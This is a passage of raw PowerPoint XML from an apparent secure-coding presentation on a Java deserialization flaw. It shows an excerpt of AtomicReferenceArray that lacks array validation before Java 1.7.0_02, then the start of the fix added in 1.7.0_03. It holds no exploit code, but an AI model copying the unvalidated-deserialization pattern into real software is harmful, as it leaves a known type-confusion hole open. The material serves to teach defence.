              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AtomicReferenceArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;E&gt; implements </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java.io.Serializable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  private static final long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>serialVersionUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                                  -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6209656149925076980L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  private </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>final Object[] array;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  private </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>static final long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>arrayFieldOffset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unsafe.objectFieldOffset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AtomicReferenceArray.class.getDeclaredField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   );  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  private </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[];</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  // Rest of class...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  // No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() method, relies on default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>readObject</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1125747" y="2819400"/>
            <a:ext cx="7162800" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -6007"/>
              <a:gd name="adj2" fmla="val -77429"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prior to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java 1.7.0_02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AtomicReferenceArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>did not validate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>array </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>during deserialization.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11339341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utoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="5798318"/>
            <a:ext cx="3657600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -28742"/>
              <a:gd name="adj2" fmla="val -209743"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent5"/>
              </a:gs>
              <a:gs pos="80000">
                <a:schemeClr val="accent1">
                  <a:shade val="93000"/>
                  <a:satMod val="130000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent1">
                  <a:shade val="94000"/>
                  <a:satMod val="135000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Copying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>serialized data to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> field</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="コンテンツ プレースホルダ 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269188" y="880971"/>
            <a:ext cx="8524875" cy="5519115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>1.7.0_03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>validates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>its array upon deserialization</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="1575" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>private void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java.io.ObjectInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
